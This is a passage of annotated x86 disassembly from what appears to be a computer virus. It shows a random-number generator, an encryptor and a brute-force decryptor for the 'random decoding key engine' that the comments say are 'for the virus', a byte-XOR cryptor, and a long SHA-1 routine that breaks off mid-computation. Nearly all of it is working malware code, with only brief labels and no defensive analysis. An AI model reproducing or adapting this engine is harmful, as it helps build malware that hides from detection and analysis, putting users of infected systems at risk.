CODE:00401C58 and eax, 7FFFFFFFh CODE:00401C5D mov ebx, [edi+9bch] CODE:00401C63 call sub_401cc0 CODE:00401C63 CODE:00401C68 xor eax, [edi+630h] CODE:00401C6E mov [edi+9bch], eax CODE:00401C74 and dword ptr [ebp+300h], 0 CODE:00401C74 CODE:00401C7B CODE:00401C7B @@_jump1: CODE:00401C7B mov ecx, [ebp+300h] CODE:00401C81 mov ebx, [edi+ecx*4] CODE:00401C84 inc dword ptr [ebp+300h] CODE:00401C8A mov edx, ebx CODE:00401C8C shr edx, 0Bh CODE:00401C8F xor ebx, edx CODE:00401C91 mov edx, ebx CODE:00401C93 shl edx, 7 CODE:00401C96 and edx, 9D2C5680h CODE:00401C9C xor ebx, edx CODE:00401C9E mov edx, ebx CODE:00401CA0 shl edx, 0Fh CODE:00401CA3 and edx, 0EFC60000h CODE:00401CA9 xor ebx, edx CODE:00401CAB mov edx, ebx CODE:00401CAD shr edx, 12h CODE:00401CB0 xor ebx, edx CODE:00401CB2 xchg eax, ebx CODE:00401CB3 retn CODE:00401CB3 CODE:00401CB3 genrand_int32 endp The previous code block generates a random number in the interval [0, 0ffffffffh]. CODE:00401D5B RDKE32Encrypt proc near CODE:00401D5B CODE:00401D5B arg_0 = dword ptr 4 CODE:00401D5B arg_4 = dword ptr 8 CODE:00401D5B arg_8 = dword ptr 0Ch CODE:00401D5B arg_c = dword ptr 10h CODE:00401D5B CODE:00401D5B pusha CODE:00401D5C mov edi, [esp+20h+arg_0] CODE:00401D60 mov ebx, [esp+20h+arg_4] CODE:00401D64 mov ecx, [esp+20h+arg_8] CODE:00401D68 mov eax, [esp+20h+arg_c] CODE:00401D6C push ebx CODE:00401D6D push ecx CODE:00401D6E push edi CODE:00401D6F call SHA1 CODE:00401D6F CODE:00401D74 call RandomNumber CODE:00401D74 CODE:00401D79 inc eax CODE:00401D7A xchg eax, edx

CODE:00401D7B call cryptor CODE:00401D7B CODE:00401D80 popa CODE:00401D81 retn 10h CODE:00401D81 CODE:00401D81 RDKE32Encrypt endp The previous code block is the random decoding key engine encryptor for the virus. CODE:00401D84 RDKE32Decrypt proc near CODE:00401D84 CODE:00401D84 arg_0 = dword ptr 4 CODE:00401D84 arg_4 = dword ptr 8 CODE:00401D84 arg_8 = dword ptr 0Ch CODE:00401D84 CODE:00401D84 pusha CODE:00401D85 mov edi, [esp+20h+arg_0] CODE:00401D89 mov ebx, [esp+20h+arg_4] CODE:00401D8D mov ecx, [esp+20h+arg_8] CODE:00401D91 sub esp, 14h CODE:00401D94 mov esi, esp CODE:00401D96 xor edx, edx CODE:00401D96 CODE:00401D98 CODE:00401D98 bruteforce_loop: CODE:00401D98 inc edx CODE:00401D99 call cryptor CODE:00401D99 CODE:00401D9E push ebx CODE:00401D9F push ecx CODE:00401DA0 push esi CODE:00401DA1 call SHA1 CODE:00401DA1 CODE:00401DA6 pusha CODE:00401DA7 push 5 CODE:00401DA9 pop ecx CODE:00401DAA repe cmpsd CODE:00401DAC popa CODE:00401DAD jz short RDKE32Decrypt_exit CODE:00401DAD CODE:00401DAF call cryptor CODE:00401DAF CODE:00401DB4 cmp ThreadExecution, 0FFFFFFFFh CODE:00401DBB jz short RDKE32Decrypt_exit CODE:00401DBB CODE:00401DBD jmp short bruteforce_loop CODE:00401DBD CODE:00401DBF CODE:00401DBF CODE:00401DBF RDKE32Decrypt_exit: CODE:00401DBF CODE:00401DBF add esp, 14h CODE:00401DC2 popa CODE:00401DC3 retn 0Ch CODE:00401DC3

CODE:00401DC3 RDKE32Decrypt endp The previous code block is the random decoding key engine decryptor for the virus. CODE:00401DD7 cryptor proc near CODE:00401DD7 CODE:00401DD7 pusha CODE:00401DD7 CODE:00401DD8 CODE:00401DD8 crypt_loop: CODE:00401DD8 test dl, dl CODE:00401DDA jz short dont_crypt CODE:00401DDA CODE:00401DDC xor [ebx], dl CODE:00401DDE inc ebx CODE:00401DDE CODE:00401DDF CODE:00401DDF dont_crypt: CODE:00401DDF rol edx, 8 CODE:00401DE2 loop crypt_loop CODE:00401DE2 CODE:00401DE4 popa CODE:00401DE5 retn CODE:00401DE5 CODE:00401DE5 cryptor endp The previous code block is a 32 bit encryptor and the decryptor for the engine. CODE:00401DF0 SHA1 CODE:00401DF0 CODE:00401DF0 CODE:00401DF0 _temp_buffer CODE:00401DF0 var_4dc CODE:00401DF0 var_4d8 CODE:00401DF0 var_4d4 CODE:00401DF0 var_4d0 CODE:00401DF0 var_4cc CODE:00401DF0 var_4c8 CODE:00401DF0 var_4c4 CODE:00401DF0 var_4c0 CODE:00401DF0 var_4bc CODE:00401DF0 var_4b8 CODE:00401DF0 var_4b4 CODE:00401DF0 var_4b0 CODE:00401DF0 var_4ac CODE:00401DF0 var_4a8 CODE:00401DF0 var_4a4 CODE:00401DF0 var_2e0 CODE:00401DF0 var_2dc CODE:00401DF0 var_2d8 CODE:00401DF0 var_2d4 CODE:00401DF0 var_2d0 CODE:00401DF0 var_2cc CODE:00401DF0 _size proc near = dword ptr -4E0h = dword ptr -4DCh = dword ptr -4D8h = dword ptr -4D4h = dword ptr -4D0h = dword ptr -4CCh = dword ptr -4C8h = dword ptr -4C4h = dword ptr -4C0h = dword ptr -4BCh = dword ptr -4B8h = dword ptr -4B4h = dword ptr -4B0h = dword ptr -4ACh = dword ptr -4A8h = dword ptr -4A4h = dword ptr -2E0h = dword ptr -2DCh = dword ptr -2D8h = dword ptr -2D4h = dword ptr -2D0h = dword ptr -2CCh = dword ptr -28Ch

CODE:00401DF0 _count = dword ptr -288h CODE:00401DF0 _flag = dword ptr -284h CODE:00401DF0 arg_0 = dword ptr 4 CODE:00401DF0 arg_4 = dword ptr 8 CODE:00401DF0 arg_8 = dword ptr 0Ch CODE:00401DF0 CODE:00401DF0 pusha CODE:00401DF1 sub esp, 260h CODE:00401DF7 cld CODE:00401DF8 mov ecx, [esp+280h+arg_4] CODE:00401DFF mov esi, [esp+280h+arg_8] CODE:00401E06 mov [esp+280h+_size], ecx CODE:00401E0A or [esp+280h+_flag], 0FFFFFFFFh CODE:00401E0F mov [esp+280h+_count], ecx CODE:00401E13 mov [esp+280h+var_2dc], 67452301h CODE:00401E1B mov [esp+280h+var_2d8], 0EFCDAB89h CODE:00401E23 mov [esp+280h+var_2d4], 98BADCFEh CODE:00401E2B mov [esp+280h+var_2d0], 10325476h CODE:00401E33 mov [esp+280h+var_2cc], 0C3D2E1F0h CODE:00401E33 CODE:00401E3B CODE:00401E3B SHA1_Loop: CODE:00401E3B CODE:00401E3B cmp [esp+280h+_count], 40h CODE:00401E40 jb SHA1_LIPOF CODE:00401E40 CODE:00401E46 mov edi, [esp+280h+var_2dc] CODE:00401E4A mov ebx, [esp+280h+var_2d8] CODE:00401E4E mov ecx, [esp+280h+var_2d4] CODE:00401E52 mov edx, [esp+280h+var_2d0] CODE:00401E56 mov ebp, [esp+280h+var_2cc] CODE:00401E5A mov [esp+280h+var_2e0], edi CODE:00401E5E lodsd CODE:00401E5F rol [esp+280h+var_2e0], 5 CODE:00401E64 bswap eax CODE:00401E66 add ebp, [esp+280h+var_2e0] CODE:00401E6A mov [esp+280h+_temp_buffer], eax CODE:00401E71 mov [esp+280h+var_2e0], ecx CODE:00401E75 xor [esp+280h+var_2e0], edx CODE:00401E79 add ebp, eax CODE:00401E7B and [esp+280h+var_2e0], ebx CODE:00401E7F xor [esp+280h+var_2e0], edx CODE:00401E83 ror ebx, 2 CODE:00401E86 lea ebp, [ebp+5a827999h] CODE:00401E8C add ebp, [esp+280h+var_2e0] CODE:00401E90 mov [esp+280h+var_2e0], ebp CODE:00401E94 lodsd CODE:00401E95 rol [esp+280h+var_2e0], 5 CODE:00401E9A bswap eax CODE:00401E9C add edx, [esp+280h+var_2e0] CODE:00401EA0 mov [esp+280h+var_4dc], eax CODE:00401EA7 mov [esp+280h+var_2e0], ebx CODE:00401EAB xor [esp+280h+var_2e0], ecx CODE:00401EAF add edx, eax CODE:00401EB1 and [esp+280h+var_2e0], edi CODE:00401EB5 xor [esp+280h+var_2e0], ecx CODE:00401EB9 ror edi, 2

CODE:00401EBC lea edx, [edx+5a827999h] CODE:00401EC2 add edx, [esp+280h+var_2e0] CODE:00401EC6 mov [esp+280h+var_2e0], edx CODE:00401ECA lodsd CODE:00401ECB rol [esp+280h+var_2e0], 5 CODE:00401ED0 bswap eax CODE:00401ED2 add ecx, [esp+280h+var_2e0] CODE:00401ED6 mov [esp+280h+var_4d8], eax CODE:00401EDD mov [esp+280h+var_2e0], edi CODE:00401EE1 xor [esp+280h+var_2e0], ebx CODE:00401EE5 add ecx, eax CODE:00401EE7 and [esp+280h+var_2e0], ebp CODE:00401EEB xor [esp+280h+var_2e0], ebx CODE:00401EEF ror ebp, 2 CODE:00401EF2 lea ecx, [ecx+5a827999h] CODE:00401EF8 add ecx, [esp+280h+var_2e0] CODE:00401EFC mov [esp+280h+var_2e0], ecx CODE:00401F00 lodsd CODE:00401F01 rol [esp+280h+var_2e0], 5 CODE:00401F06 bswap eax CODE:00401F08 add ebx, [esp+280h+var_2e0] CODE:00401F0C mov [esp+280h+var_4d4], eax CODE:00401F13 mov [esp+280h+var_2e0], ebp CODE:00401F17 xor [esp+280h+var_2e0], edi CODE:00401F1B add ebx, eax CODE:00401F1D and [esp+280h+var_2e0], edx CODE:00401F21 xor [esp+280h+var_2e0], edi CODE:00401F25 ror edx, 2 CODE:00401F28 lea ebx, [ebx+5a827999h] CODE:00401F2E add ebx, [esp+280h+var_2e0] CODE:00401F32 mov [esp+280h+var_2e0], ebx CODE:00401F36 lodsd CODE:00401F37 rol [esp+280h+var_2e0], 5 CODE:00401F3C bswap eax CODE:00401F3E add edi, [esp+280h+var_2e0] CODE:00401F42 mov [esp+280h+var_4d0], eax CODE:00401F49 mov [esp+280h+var_2e0], edx CODE:00401F4D xor [esp+280h+var_2e0], ebp CODE:00401F51 add edi, eax CODE:00401F53 and [esp+280h+var_2e0], ecx CODE:00401F57 xor [esp+280h+var_2e0], ebp CODE:00401F5B ror ecx, 2 CODE:00401F5E lea edi, [edi+5a827999h] CODE:00401F64 add edi, [esp+280h+var_2e0] CODE:00401F68 mov [esp+280h+var_2e0], edi CODE:00401F6C lodsd CODE:00401F6D rol [esp+280h+var_2e0], 5 CODE:00401F72 bswap eax CODE:00401F74 add ebp, [esp+280h+var_2e0] CODE:00401F78 mov [esp+280h+var_4cc], eax CODE:00401F7F mov [esp+280h+var_2e0], ecx CODE:00401F83 xor [esp+280h+var_2e0], edx CODE:00401F87 add ebp, eax CODE:00401F89 and [esp+280h+var_2e0], ebx CODE:00401F8D xor [esp+280h+var_2e0], edx CODE:00401F91 ror ebx, 2 CODE:00401F94 lea ebp, [ebp+5a827999h]

CODE:00401F9A add ebp, [esp+280h+var_2e0] CODE:00401F9E mov [esp+280h+var_2e0], ebp CODE:00401FA2 lodsd CODE:00401FA3 rol [esp+280h+var_2e0], 5 CODE:00401FA8 bswap eax CODE:00401FAA add edx, [esp+280h+var_2e0] CODE:00401FAE mov [esp+280h+var_4c8], eax CODE:00401FB5 mov [esp+280h+var_2e0], ebx CODE:00401FB9 xor [esp+280h+var_2e0], ecx CODE:00401FBD add edx, eax CODE:00401FBF and [esp+280h+var_2e0], edi CODE:00401FC3 xor [esp+280h+var_2e0], ecx CODE:00401FC7 ror edi, 2 CODE:00401FCA lea edx, [edx+5a827999h] CODE:00401FD0 add edx, [esp+280h+var_2e0] CODE:00401FD4 mov [esp+280h+var_2e0], edx CODE:00401FD8 lodsd CODE:00401FD9 rol [esp+280h+var_2e0], 5 CODE:00401FDE bswap eax CODE:00401FE0 add ecx, [esp+280h+var_2e0] CODE:00401FE4 mov [esp+280h+var_4c4], eax CODE:00401FEB mov [esp+280h+var_2e0], edi CODE:00401FEF xor [esp+280h+var_2e0], ebx CODE:00401FF3 add ecx, eax CODE:00401FF5 and [esp+280h+var_2e0], ebp CODE:00401FF9 xor [esp+280h+var_2e0], ebx CODE:00401FFD ror ebp, 2 CODE:00402000 lea ecx, [ecx+5a827999h] CODE:00402006 add ecx, [esp+280h+var_2e0] CODE:0040200A mov [esp+280h+var_2e0], ecx CODE:0040200E lodsd CODE:0040200F rol [esp+280h+var_2e0], 5 CODE:00402014 bswap eax CODE:00402016 add ebx, [esp+280h+var_2e0] CODE:0040201A mov [esp+280h+var_4c0], eax CODE:00402021 mov [esp+280h+var_2e0], ebp CODE:00402025 xor [esp+280h+var_2e0], edi CODE:00402029 add ebx, eax CODE:0040202B and [esp+280h+var_2e0], edx CODE:0040202F xor [esp+280h+var_2e0], edi CODE:00402033 ror edx, 2 CODE:00402036 lea ebx, [ebx+5a827999h] CODE:0040203C add ebx, [esp+280h+var_2e0] CODE:00402040 mov [esp+280h+var_2e0], ebx CODE:00402044 lodsd CODE:00402045 rol [esp+280h+var_2e0], 5 CODE:0040204A bswap eax CODE:0040204C add edi, [esp+280h+var_2e0] CODE:00402050 mov [esp+280h+var_4bc], eax CODE:00402057 mov [esp+280h+var_2e0], edx CODE:0040205B xor [esp+280h+var_2e0], ebp CODE:0040205F add edi, eax CODE:00402061 and [esp+280h+var_2e0], ecx CODE:00402065 xor [esp+280h+var_2e0], ebp CODE:00402069 ror ecx, 2 CODE:0040206C lea edi, [edi+5a827999h] CODE:00402072 add edi, [esp+280h+var_2e0]

CODE:00402076 mov [esp+280h+var_2e0], edi CODE:0040207A lodsd CODE:0040207B rol [esp+280h+var_2e0], 5 CODE:00402080 bswap eax CODE:00402082 add ebp, [esp+280h+var_2e0] CODE:00402086 mov [esp+280h+var_4b8], eax CODE:0040208D mov [esp+280h+var_2e0], ecx CODE:00402091 xor [esp+280h+var_2e0], edx CODE:00402095 add ebp, eax CODE:00402097 and [esp+280h+var_2e0], ebx CODE:0040209B xor [esp+280h+var_2e0], edx CODE:0040209F ror ebx, 2 CODE:004020A2 lea ebp, [ebp+5a827999h] CODE:004020A8 add ebp, [esp+280h+var_2e0] CODE:004020AC mov [esp+280h+var_2e0], ebp CODE:004020B0 lodsd CODE:004020B1 rol [esp+280h+var_2e0], 5 CODE:004020B6 bswap eax CODE:004020B8 add edx, [esp+280h+var_2e0] CODE:004020BC mov [esp+280h+var_4b4], eax CODE:004020C3 mov [esp+280h+var_2e0], ebx CODE:004020C7 xor [esp+280h+var_2e0], ecx CODE:004020CB add edx, eax CODE:004020CD and [esp+280h+var_2e0], edi CODE:004020D1 xor [esp+280h+var_2e0], ecx CODE:004020D5 ror edi, 2 CODE:004020D8 lea edx, [edx+5a827999h] CODE:004020DE add edx, [esp+280h+var_2e0] CODE:004020E2 mov [esp+280h+var_2e0], edx CODE:004020E6 lodsd CODE:004020E7 rol [esp+280h+var_2e0], 5 CODE:004020EC bswap eax CODE:004020EE add ecx, [esp+280h+var_2e0] CODE:004020F2 mov [esp+280h+var_4b0], eax CODE:004020F9 mov [esp+280h+var_2e0], edi CODE:004020FD xor [esp+280h+var_2e0], ebx CODE:00402101 add ecx, eax CODE:00402103 and [esp+280h+var_2e0], ebp CODE:00402107 xor [esp+280h+var_2e0], ebx CODE:0040210B ror ebp, 2 CODE:0040210E lea ecx, [ecx+5a827999h] CODE:00402114 add ecx, [esp+280h+var_2e0] CODE:00402118 mov [esp+280h+var_2e0], ecx CODE:0040211C lodsd CODE:0040211D rol [esp+280h+var_2e0], 5 CODE:00402122 bswap eax CODE:00402124 add ebx, [esp+280h+var_2e0] CODE:00402128 mov [esp+280h+var_4ac], eax CODE:0040212F mov [esp+280h+var_2e0], ebp CODE:00402133 xor [esp+280h+var_2e0], edi CODE:00402137 add ebx, eax CODE:00402139 and [esp+280h+var_2e0], edx CODE:0040213D xor [esp+280h+var_2e0], edi CODE:00402141 ror edx, 2 CODE:00402144 lea ebx, [ebx+5a827999h] CODE:0040214A add ebx, [esp+280h+var_2e0] CODE:0040214E mov [esp+280h+var_2e0], ebx

CODE:00402152 lodsd CODE:00402153 rol [esp+280h+var_2e0], 5 CODE:00402158 bswap eax CODE:0040215A add edi, [esp+280h+var_2e0] CODE:0040215E mov [esp+280h+var_4a8], eax CODE:00402165 mov [esp+280h+var_2e0], edx CODE:00402169 xor [esp+280h+var_2e0], ebp CODE:0040216D add edi, eax CODE:0040216F and [esp+280h+var_2e0], ecx CODE:00402173 xor [esp+280h+var_2e0], ebp CODE:00402177 ror ecx, 2 CODE:0040217A lea edi, [edi+5a827999h] CODE:00402180 add edi, [esp+280h+var_2e0] CODE:00402184 mov [esp+280h+var_2e0], edi CODE:00402188 lodsd CODE:00402189 rol [esp+280h+var_2e0], 5 CODE:0040218E bswap eax CODE:00402190 add ebp, [esp+280h+var_2e0] CODE:00402194 mov [esp+280h+var_4a4], eax CODE:0040219B mov [esp+280h+var_2e0], ecx CODE:0040219F xor [esp+280h+var_2e0], edx CODE:004021A3 add ebp, eax CODE:004021A5 and [esp+280h+var_2e0], ebx CODE:004021A9 xor [esp+280h+var_2e0], edx CODE:004021AD ror ebx, 2 CODE:004021B0 lea ebp, [ebp+5a827999h] CODE:004021B6 add ebp, [esp+280h+var_2e0] CODE:004021BA mov [esp+280h+var_2e0], ebp CODE:004021BE mov eax, [esp+280h+var_4ac] CODE:004021C5 rol [esp+280h+var_2e0], 5 CODE:004021CA xor eax, [esp+280h+var_4c0] CODE:004021D1 add edx, [esp+280h+var_2e0] CODE:004021D5 xor eax, [esp+280h+var_4d8] CODE:004021DC mov [esp+280h+var_2e0], ebx CODE:004021E0 xor eax, [esp+280h+_temp_buffer] CODE:004021E7 xor [esp+280h+var_2e0], ecx CODE:004021EB rol eax, 1 CODE:004021ED and [esp+280h+var_2e0], edi CODE:004021F1 mov [esp+280h+_temp_buffer], eax CODE:004021F8 xor [esp+280h+var_2e0], ecx CODE:004021FC add edx, eax CODE:004021FE ror edi, 2 CODE:00402201 lea edx, [edx+5a827999h] CODE:00402207 add edx, [esp+280h+var_2e0] CODE:0040220B mov [esp+280h+var_2e0], edx CODE:0040220F mov eax, [esp+280h+var_4a8] CODE:00402216 rol [esp+280h+var_2e0], 5 CODE:0040221B xor eax, [esp+280h+var_4bc] CODE:00402222 add ecx, [esp+280h+var_2e0] CODE:00402226 xor eax, [esp+280h+var_4d4] CODE:0040222D mov [esp+280h+var_2e0], edi CODE:00402231 xor eax, [esp+280h+var_4dc] CODE:00402238 xor [esp+280h+var_2e0], ebx CODE:0040223C rol eax, 1 CODE:0040223E and [esp+280h+var_2e0], ebp CODE:00402242 mov [esp+280h+var_4dc], eax CODE:00402249 xor [esp+280h+var_2e0], ebx

CODE:0040224D add ecx, eax CODE:0040224F ror ebp, 2 CODE:00402252 lea ecx, [ecx+5a827999h] CODE:00402258 add ecx, [esp+280h+var_2e0] CODE:0040225C mov [esp+280h+var_2e0], ecx CODE:00402260 mov eax, [esp+280h+var_4a4] CODE:00402267 rol [esp+280h+var_2e0], 5 CODE:0040226C xor eax, [esp+280h+var_4b8] CODE:00402273 add ebx, [esp+280h+var_2e0] CODE:00402277 xor eax, [esp+280h+var_4d0] CODE:0040227E mov [esp+280h+var_2e0], ebp CODE:00402282 xor eax, [esp+280h+var_4d8] CODE:00402289 xor [esp+280h+var_2e0], edi CODE:0040228D rol eax, 1 CODE:0040228F and [esp+280h+var_2e0], edx CODE:00402293 mov [esp+280h+var_4d8], eax CODE:0040229A xor [esp+280h+var_2e0], edi CODE:0040229E add ebx, eax CODE:004022A0 ror edx, 2 CODE:004022A3 lea ebx, [ebx+5a827999h] CODE:004022A9 add ebx, [esp+280h+var_2e0] CODE:004022AD mov [esp+280h+var_2e0], ebx CODE:004022B1 mov eax, [esp+280h+_temp_buffer] CODE:004022B8 rol [esp+280h+var_2e0], 5 CODE:004022BD xor eax, [esp+280h+var_4b4] CODE:004022C4 add edi, [esp+280h+var_2e0] CODE:004022C8 xor eax, [esp+280h+var_4cc] CODE:004022CF mov [esp+280h+var_2e0], edx CODE:004022D3 xor eax, [esp+280h+var_4d4] CODE:004022DA xor [esp+280h+var_2e0], ebp CODE:004022DE rol eax, 1 CODE:004022E0 and [esp+280h+var_2e0], ecx CODE:004022E4 mov [esp+280h+var_4d4], eax CODE:004022EB xor [esp+280h+var_2e0], ebp CODE:004022EF add edi, eax CODE:004022F1 ror ecx, 2 CODE:004022F4 lea edi, [edi+5a827999h] CODE:004022FA add edi, [esp+280h+var_2e0] CODE:004022FE mov [esp+280h+var_2e0], edi CODE:00402302 mov eax, [esp+280h+var_4dc] CODE:00402309 rol [esp+280h+var_2e0], 5 CODE:0040230E xor eax, [esp+280h+var_4b0] CODE:00402315 add ebp, [esp+280h+var_2e0] CODE:00402319 xor eax, [esp+280h+var_4c8] CODE:00402320 mov [esp+280h+var_2e0], ebx CODE:00402324 xor eax, [esp+280h+var_4d0] CODE:0040232B xor [esp+280h+var_2e0], ecx CODE:0040232F rol eax, 1 CODE:00402331 xor [esp+280h+var_2e0], edx CODE:00402335 mov [esp+280h+var_4d0], eax CODE:0040233C add ebp, [esp+280h+var_2e0] CODE:00402340 ror ebx, 2 CODE:00402343 lea ebp, [ebp+eax+6ed9eba1h] CODE:0040234A mov [esp+280h+var_2e0], ebp CODE:0040234E mov eax, [esp+280h+var_4d8] CODE:00402355 rol [esp+280h+var_2e0], 5 CODE:0040235A xor eax, [esp+280h+var_4ac]

CODE:00402361 add edx, [esp+280h+var_2e0] CODE:00402365 xor eax, [esp+280h+var_4c4] CODE:0040236C mov [esp+280h+var_2e0], edi CODE:00402370 xor eax, [esp+280h+var_4cc] CODE:00402377 xor [esp+280h+var_2e0], ebx CODE:0040237B rol eax, 1 CODE:0040237D xor [esp+280h+var_2e0], ecx CODE:00402381 mov [esp+280h+var_4cc], eax CODE:00402388 add edx, [esp+280h+var_2e0] CODE:0040238C ror edi, 2 CODE:0040238F lea edx, [edx+eax+6ed9eba1h] CODE:00402396 mov [esp+280h+var_2e0], edx CODE:0040239A mov eax, [esp+280h+var_4d4] CODE:004023A1 rol [esp+280h+var_2e0], 5 CODE:004023A6 xor eax, [esp+280h+var_4a8] CODE:004023AD add ecx, [esp+280h+var_2e0] CODE:004023B1 xor eax, [esp+280h+var_4c0] CODE:004023B8 mov [esp+280h+var_2e0], ebp CODE:004023BC xor eax, [esp+280h+var_4c8] CODE:004023C3 xor [esp+280h+var_2e0], edi CODE:004023C7 rol eax, 1 CODE:004023C9 xor [esp+280h+var_2e0], ebx CODE:004023CD mov [esp+280h+var_4c8], eax CODE:004023D4 add ecx, [esp+280h+var_2e0] CODE:004023D8 ror ebp, 2 CODE:004023DB lea ecx, [ecx+eax+6ed9eba1h] CODE:004023E2 mov [esp+280h+var_2e0], ecx CODE:004023E6 mov eax, [esp+280h+var_4d0] CODE:004023ED rol [esp+280h+var_2e0], 5 CODE:004023F2 xor eax, [esp+280h+var_4a4] CODE:004023F9 add ebx, [esp+280h+var_2e0] CODE:004023FD xor eax, [esp+280h+var_4bc] CODE:00402404 mov [esp+280h+var_2e0], edx CODE:00402408 xor eax, [esp+280h+var_4c4] CODE:0040240F xor [esp+280h+var_2e0], ebp CODE:00402413 rol eax, 1 CODE:00402415 xor [esp+280h+var_2e0], edi CODE:00402419 mov [esp+280h+var_4c4], eax CODE:00402420 add ebx, [esp+280h+var_2e0] CODE:00402424 ror edx, 2 CODE:00402427 lea ebx, [ebx+eax+6ed9eba1h] CODE:0040242E mov [esp+280h+var_2e0], ebx CODE:00402432 mov eax, [esp+280h+var_4cc] CODE:00402439 rol [esp+280h+var_2e0], 5 CODE:0040243E xor eax, [esp+280h+_temp_buffer] CODE:00402445 add edi, [esp+280h+var_2e0] CODE:00402449 xor eax, [esp+280h+var_4b8] CODE:00402450 mov [esp+280h+var_2e0], ecx CODE:00402454 xor eax, [esp+280h+var_4c0] CODE:0040245B xor [esp+280h+var_2e0], edx CODE:0040245F rol eax, 1 CODE:00402461 xor [esp+280h+var_2e0], ebp CODE:00402465 mov [esp+280h+var_4c0], eax CODE:0040246C add edi, [esp+280h+var_2e0] CODE:00402470 ror ecx, 2 CODE:00402473 lea edi, [edi+eax+6ed9eba1h] CODE:0040247A mov [esp+280h+var_2e0], edi

CODE:0040247E mov eax, [esp+280h+var_4c8] CODE:00402485 rol [esp+280h+var_2e0], 5 CODE:0040248A xor eax, [esp+280h+var_4dc] CODE:00402491 add ebp, [esp+280h+var_2e0] CODE:00402495 xor eax, [esp+280h+var_4b4] CODE:0040249C mov [esp+280h+var_2e0], ebx CODE:004024A0 xor eax, [esp+280h+var_4bc] CODE:004024A7 xor [esp+280h+var_2e0], ecx CODE:004024AB rol eax, 1 CODE:004024AD xor [esp+280h+var_2e0], edx CODE:004024B1 mov [esp+280h+var_4bc], eax CODE:004024B8 add ebp, [esp+280h+var_2e0] CODE:004024BC ror ebx, 2 CODE:004024BF lea ebp, [ebp+eax+6ed9eba1h] CODE:004024C6 mov [esp+280h+var_2e0], ebp CODE:004024CA mov eax, [esp+280h+var_4c4] CODE:004024D1 rol [esp+280h+var_2e0], 5 CODE:004024D6 xor eax, [esp+280h+var_4d8] CODE:004024DD add edx, [esp+280h+var_2e0] CODE:004024E1 xor eax, [esp+280h+var_4b0] CODE:004024E8 mov [esp+280h+var_2e0], edi CODE:004024EC xor eax, [esp+280h+var_4b8] CODE:004024F3 xor [esp+280h+var_2e0], ebx CODE:004024F7 rol eax, 1 CODE:004024F9 xor [esp+280h+var_2e0], ecx CODE:004024FD mov [esp+280h+var_4b8], eax CODE:00402504 add edx, [esp+280h+var_2e0] CODE:00402508 ror edi, 2 CODE:0040250B lea edx, [edx+eax+6ed9eba1h] CODE:00402512 mov [esp+280h+var_2e0], edx CODE:00402516 mov eax, [esp+280h+var_4c0] CODE:0040251D rol [esp+280h+var_2e0], 5 CODE:00402522 xor eax, [esp+280h+var_4d4] CODE:00402529 add ecx, [esp+280h+var_2e0] CODE:0040252D xor eax, [esp+280h+var_4ac] CODE:00402534 mov [esp+280h+var_2e0], ebp CODE:00402538 xor eax, [esp+280h+var_4b4] CODE:0040253F xor [esp+280h+var_2e0], edi CODE:00402543 rol eax, 1 CODE:00402545 xor [esp+280h+var_2e0], ebx CODE:00402549 mov [esp+280h+var_4b4], eax CODE:00402550 add ecx, [esp+280h+var_2e0] CODE:00402554 ror ebp, 2 CODE:00402557 lea ecx, [ecx+eax+6ed9eba1h] CODE:0040255E mov [esp+280h+var_2e0], ecx CODE:00402562 mov eax, [esp+280h+var_4bc] CODE:00402569 rol [esp+280h+var_2e0], 5 CODE:0040256E xor eax, [esp+280h+var_4d0] CODE:00402575 add ebx, [esp+280h+var_2e0] CODE:00402579 xor eax, [esp+280h+var_4a8] CODE:00402580 mov [esp+280h+var_2e0], edx CODE:00402584 xor eax, [esp+280h+var_4b0] CODE:0040258B xor [esp+280h+var_2e0], ebp CODE:0040258F rol eax, 1 CODE:00402591 xor [esp+280h+var_2e0], edi CODE:00402595 mov [esp+280h+var_4b0], eax CODE:0040259C add ebx, [esp+280h+var_2e0]

CODE:004025A0 ror edx, 2 CODE:004025A3 lea ebx, [ebx+eax+6ed9eba1h] CODE:004025AA mov [esp+280h+var_2e0], ebx CODE:004025AE mov eax, [esp+280h+var_4b8] CODE:004025B5 rol [esp+280h+var_2e0], 5 CODE:004025BA xor eax, [esp+280h+var_4cc] CODE:004025C1 add edi, [esp+280h+var_2e0] CODE:004025C5 xor eax, [esp+280h+var_4a4] CODE:004025CC mov [esp+280h+var_2e0], ecx CODE:004025D0 xor eax, [esp+280h+var_4ac] CODE:004025D7 xor [esp+280h+var_2e0], edx CODE:004025DB rol eax, 1 CODE:004025DD xor [esp+280h+var_2e0], ebp CODE:004025E1 mov [esp+280h+var_4ac], eax CODE:004025E8 add edi, [esp+280h+var_2e0] CODE:004025EC ror ecx, 2 CODE:004025EF lea edi, [edi+eax+6ed9eba1h] CODE:004025F6 mov [esp+280h+var_2e0], edi CODE:004025FA mov eax, [esp+280h+var_4b4] CODE:00402601 rol [esp+280h+var_2e0], 5 CODE:00402606 xor eax, [esp+280h+var_4c8] CODE:0040260D add ebp, [esp+280h+var_2e0] CODE:00402611 xor eax, [esp+280h+_temp_buffer] CODE:00402618 mov [esp+280h+var_2e0], ebx CODE:0040261C xor eax, [esp+280h+var_4a8] CODE:00402623 xor [esp+280h+var_2e0], ecx CODE:00402627 rol eax, 1 CODE:00402629 xor [esp+280h+var_2e0], edx CODE:0040262D mov [esp+280h+var_4a8], eax CODE:00402634 add ebp, [esp+280h+var_2e0] CODE:00402638 ror ebx, 2 CODE:0040263B lea ebp, [ebp+eax+6ed9eba1h] CODE:00402642 mov [esp+280h+var_2e0], ebp CODE:00402646 mov eax, [esp+280h+var_4b0] CODE:0040264D rol [esp+280h+var_2e0], 5 CODE:00402652 xor eax, [esp+280h+var_4c4] CODE:00402659 add edx, [esp+280h+var_2e0] CODE:0040265D xor eax, [esp+280h+var_4dc] CODE:00402664 mov [esp+280h+var_2e0], edi CODE:00402668 xor eax, [esp+280h+var_4a4] CODE:0040266F xor [esp+280h+var_2e0], ebx CODE:00402673 rol eax, 1 CODE:00402675 xor [esp+280h+var_2e0], ecx CODE:00402679 mov [esp+280h+var_4a4], eax CODE:00402680 add edx, [esp+280h+var_2e0] CODE:00402684 ror edi, 2 CODE:00402687 lea edx, [edx+eax+6ed9eba1h] CODE:0040268E mov [esp+280h+var_2e0], edx CODE:00402692 mov eax, [esp+280h+var_4ac] CODE:00402699 rol [esp+280h+var_2e0], 5 CODE:0040269E xor eax, [esp+280h+var_4c0] CODE:004026A5 add ecx, [esp+280h+var_2e0] CODE:004026A9 xor eax, [esp+280h+var_4d8] CODE:004026B0 mov [esp+280h+var_2e0], ebp CODE:004026B4 xor eax, [esp+280h+_temp_buffer] CODE:004026BB xor [esp+280h+var_2e0], edi CODE:004026BF rol eax, 1

